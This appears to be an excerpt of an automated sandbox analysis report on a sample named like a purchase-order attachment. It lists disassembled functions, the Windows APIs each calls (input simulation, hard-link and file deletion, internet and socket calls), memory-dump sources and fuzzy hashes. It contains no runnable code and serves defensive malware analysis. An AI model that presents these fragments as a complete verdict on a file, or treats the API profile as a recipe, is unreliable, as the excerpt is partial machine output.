                      • Opcode Fuzzy Hash: e4edc803501fef75fa045dd7e6eb95a343cac85b9ea957d863790061443a8e95
                      • Instruction Fuzzy Hash: A2515E7190020CEFCF20DFA9C984ABE7BB6BB45361F208659FA159B291D770ED41CB90
                      Function 00ACD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00ACD258
                      • __itow.LIBCMT ref: 00ACD292
                        • Part of subcall function 00ACD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00ACD549
                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00ACD2FB
                      • __itow.LIBCMT ref: 00ACD350
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$__itow
                      • String ID:
                      • API String ID: 3379773720-0
                      • Opcode ID: 411978e5c2f3fb6bd7c4c4dea69985aef342b9a99261be9ca236a74cce21362a
                      • Instruction ID: ef7afff2ac138046127a9bf73c1930dcfc00b914aa2ccfd0f9d393ec2468a55d
                      • Opcode Fuzzy Hash: 411978e5c2f3fb6bd7c4c4dea69985aef342b9a99261be9ca236a74cce21362a
                      • Instruction Fuzzy Hash: 2B418371B00209ABDF15DF54C952FEE7BF9AF48700F000029FA05A7292DB749E45CB62
                      Function 00ADEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ADEF32
                      • GetLastError.KERNEL32(?,00000000), ref: 00ADEF58
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ADEF7D
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ADEFA9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: e598f7504f425df8f3e395504951bbe7ceed058ec92c4d0033500f788e2d7c2c
                      • Instruction ID: 46c8c45cc2955287c9050597002ca139d9d3945ed9076ef46ebfb7f8d692fbbd
                      • Opcode Fuzzy Hash: e598f7504f425df8f3e395504951bbe7ceed058ec92c4d0033500f788e2d7c2c
                      • Instruction Fuzzy Hash: 1E411739600611DFCF11EF15C685A59BBE5EF89320B198499E846AF762CB34FD40CB91
                      Function 00AFB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                      Download Yara Rule
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AFB3E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: 32d5e8dc3414661a03114002cc91a957dc3dbebbdf29e0950a90ade93a498274
                      • Instruction ID: f57dbd6ccfc479fe6d048084e56f21f4eee67c919b4fba707cd757bbe91f5c01
                      • Opcode Fuzzy Hash: 32d5e8dc3414661a03114002cc91a957dc3dbebbdf29e0950a90ade93a498274
                      • Instruction Fuzzy Hash: 5831903466020CABEF249F98CE85BB87775AB05352F648612FB51DB5E2C730E9409B71
                      Function 00AFD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                      Download Yara Rule
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00AFD617
                      • GetWindowRect.USER32(?,?), ref: 00AFD68D
                      • PtInRect.USER32(?,?,00AFEB2C), ref: 00AFD69D
                      • MessageBeep.USER32(00000000), ref: 00AFD70E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                      • Instruction ID: 7e109cf059f56e222e21493904a3c5d33ee9bca520383e562849b767abdfa96b
                      • Opcode Fuzzy Hash: 84fe680841f93bee930f589ad6f90acdda8edda2f4b599ecc22c12ded9a7d314
                      • Instruction Fuzzy Hash: F4415A30A10218DFCB52DF98D884BA9BBF6BB45305F1481AAF609DF251D730E841CB50
                      Function 00AD4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00AD44EE
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AD450A
                      • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AD456A
                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00AD45C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: dca12bbf99c875e1a962f2b1f54650fb551e74dafede31a6e6fe871d2c454def
                      • Instruction ID: dcbb9ec5aa6981d8c5b64920495dc73b264e2d6fd44b8b294b4910edbc54191f
                      • Opcode Fuzzy Hash: dca12bbf99c875e1a962f2b1f54650fb551e74dafede31a6e6fe871d2c454def
                      • Instruction Fuzzy Hash: 9A31E2B1A04298AFEF208B64A9087FE7BB69B5D314F04025BF483933C1CB749E44D762
                      Function 00AC4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC4DE8
                      • __isleadbyte_l.LIBCMT ref: 00AC4E16
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E44
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AC4E7A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                      • Instruction ID: d4ceebad42b0ab1f6d5936799ddcedec978f8fb25dc862a43ec1371e8dbb258d
                      • Opcode Fuzzy Hash: e7149f95d94175e0ea4993f3516c433070e9e42041a6af2d9a4066ff2a6e6a2a
                      • Instruction Fuzzy Hash: 7631BE31600206AFDF229F74C855FEA7BAAFF49320F17852DE8218B1A1E730D850DB94
                      Function 00AF7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32 ref: 00AF7AB6
                        • Part of subcall function 00AD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AD69E3
                        • Part of subcall function 00AD69C9: GetCurrentThreadId.KERNEL32 ref: 00AD69EA
                        • Part of subcall function 00AD69C9: AttachThreadInput.USER32(00000000,?,00AD8127), ref: 00AD69F1
                      • GetCaretPos.USER32(?), ref: 00AF7AC7
                      • ClientToScreen.USER32(00000000,?), ref: 00AF7B00
                      • GetForegroundWindow.USER32 ref: 00AF7B06
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: 21eda53070060770029fff8cced7f8c46bd45f1874026c69b08194907cbc1b15
                      • Instruction ID: 5b918819135cd635898520ee85cca2bbd798cd533f96c5157b4b9d4b59e710d2
                      • Opcode Fuzzy Hash: 21eda53070060770029fff8cced7f8c46bd45f1874026c69b08194907cbc1b15
                      • Instruction Fuzzy Hash: F7311071D00108AFCB00EFB9D9859EFBBF9EF55310B11846AE415E7251DB359E058BA0
                      Function 00AFEFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                      • GetCursorPos.USER32(?), ref: 00AFEFE2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B0F3C3,?,?,?,?,?), ref: 00AFEFF7
                      • GetCursorPos.USER32(?), ref: 00AFF041
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B0F3C3,?,?,?), ref: 00AFF077
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                      • Instruction ID: 3bf1fcf76baa129981ec7e738c3d211af3640420e657fd395e210efc0c80e1a8
                      • Opcode Fuzzy Hash: 439405e162395ae1de18cf9073b67bb6ccb01df375efeb18140a64f0e939a102
                      • Instruction Fuzzy Hash: 7E21BF35600128AFCB258F98CC98FFA7BB5EF49754F0440A9FA05972A2DB319D51DBA0
                      Function 00AE497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE49B7
                        • Part of subcall function 00AE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                        • Part of subcall function 00AE4A41: InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Internet$CloseConnectHandleOpen
                      • String ID:
                      • API String ID: 1463438336-0
                      • Opcode ID: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                      • Instruction ID: 19d6824dde8c9a8686f8dc90856dc32f7c37422a17e4aac602502dcf6238f90c
                      • Opcode Fuzzy Hash: 6e7fc32f9726c4047e05b698b264d6267f1eed2932a7802fd02abf6fd4484bae
                      • Instruction Fuzzy Hash: 8C21A431640A45BFDB129F629C00FBBBBBDFB48711F14402AFA0597551EB71D811A794
                      Function 00AF8834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowLongW.USER32(?,000000EC), ref: 00AF88A3
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88BD
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF88CB
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF88D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      • Opcode ID: b04db9dafb3fa1413faecf7316b5edb4270383c1b89521dfc51d802315bf8c62
                      • Instruction ID: fa9c12fb4ccfa4e3f6744cd8e67c3407b16f225f6580e2496927dd5a92aa4287
                      • Opcode Fuzzy Hash: b04db9dafb3fa1413faecf7316b5edb4270383c1b89521dfc51d802315bf8c62
                      • Instruction Fuzzy Hash: 06118E32305515AFDB14AB68CD05FBA7BE9EF853A0F548119F916C72E2CB78AD00CB94
                      Function 00AE900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                      Download Yara Rule
                      APIs
                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00AE906D
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00AE907F
                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00AE908C
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE90A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastacceptselect
                      • String ID:
                      • API String ID: 385091864-0
                      • Opcode ID: 2d2d716863cb3b458f76aeff6d9b930020cff35c293f040e740cc182b55b917b
                      • Instruction ID: 2f11a629b02f5a6ce561cdf1016dcb283f13c6edf11789710a6fa50f723e64de
                      • Opcode Fuzzy Hash: 2d2d716863cb3b458f76aeff6d9b930020cff35c293f040e740cc182b55b917b
                      • Instruction Fuzzy Hash: 3C215475A001249FCB10DF69C985ADABBFCEF49710F40816AF849D7291DB749E41CB90
                      Function 00AD18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AD2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2CB9
                        • Part of subcall function 00AD2CAA: lstrcpyW.KERNEL32(00000000,?,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD2CDF
                        • Part of subcall function 00AD2CAA: lstrcmpiW.KERNEL32(00000000,?,00AD18FD,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?), ref: 00AD2D10
                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1916
                      • lstrcpyW.KERNEL32(00000000,?,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD193C
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AD26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00AD1970
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 2eb33862c0016dacb9ec238092cd3939fceeab0eb15a73c7d54dee460f571ad5
                      • Instruction ID: d90f88ccdb2eec68ced1e565229e91f3a3e114704b7caf384eda7d52697edfef
                      • Opcode Fuzzy Hash: 2eb33862c0016dacb9ec238092cd3939fceeab0eb15a73c7d54dee460f571ad5
                      • Instruction Fuzzy Hash: E611BB3A200301BFDB15AF74D865EBA77B8FF44350B80902AF807CB2A0EB319951C7A1
                      Function 00AC3D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00AC3D65
                        • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 3cde1a863a22e7530dc868071aac73072ee7daba5fa8b73411f13bb4909d0b30
                      • Instruction ID: b282e34a3dd9e9cc218409ecdf2fa378ecf288c382137774afdd96ca70e8228b
                      • Opcode Fuzzy Hash: 3cde1a863a22e7530dc868071aac73072ee7daba5fa8b73411f13bb4909d0b30
                      • Instruction Fuzzy Hash: 691194335016119BDF223FB4A945BE93BAC6F40360B518D2AF94A9A152DF358940C750
                      Function 00AD713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AD715C
                      • _memset.LIBCMT ref: 00AD717D
                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AD71CF
                      • CloseHandle.KERNEL32(00000000), ref: 00AD71D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseControlCreateDeviceFileHandle_memset
                      • String ID:
                      • API String ID: 1157408455-0
                      • Opcode ID: af61383b4881015c8070b82015a868cdf2c50f9d2dca0278268e754dc5ddb3ab
                      • Instruction ID: a1eea2d398c02212db288245066e30354a9717793d2c86a577f2fffaa65fd17a
                      • Opcode Fuzzy Hash: af61383b4881015c8070b82015a868cdf2c50f9d2dca0278268e754dc5ddb3ab
                      • Instruction Fuzzy Hash: BD11CA759012287AE7205B65AC4DFEFBABCEF45760F10429AF505E72D0D6744F808BA4
                      Function 00AD13D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AD13EE
                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AD1409
                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AD141F
                      • FreeLibrary.KERNEL32(?), ref: 00AD1474
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                      • String ID:
                      • API String ID: 3137044355-0
                      • Opcode ID: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                      • Instruction ID: 0f7ab863085de54abc81621eefba39c26ef5aaa55135b1ff4cdebd37109aa3f7
                      • Opcode Fuzzy Hash: fb26d6dec7ec11f7900659f6d2e784b1470290a221c8508ede9da261c1e7d72d
                      • Instruction Fuzzy Hash: C1216AF1A40209BBDB209F95ED88ADABBB8EF00744F40856BE52397250DB74EA44DB51
                      Function 00AE92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                        • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                      • gethostbyname.WSOCK32(?), ref: 00AE92F0
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE92FB
                      • _memmove.LIBCMT ref: 00AE9328
                      • inet_ntoa.WSOCK32(?), ref: 00AE9333
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
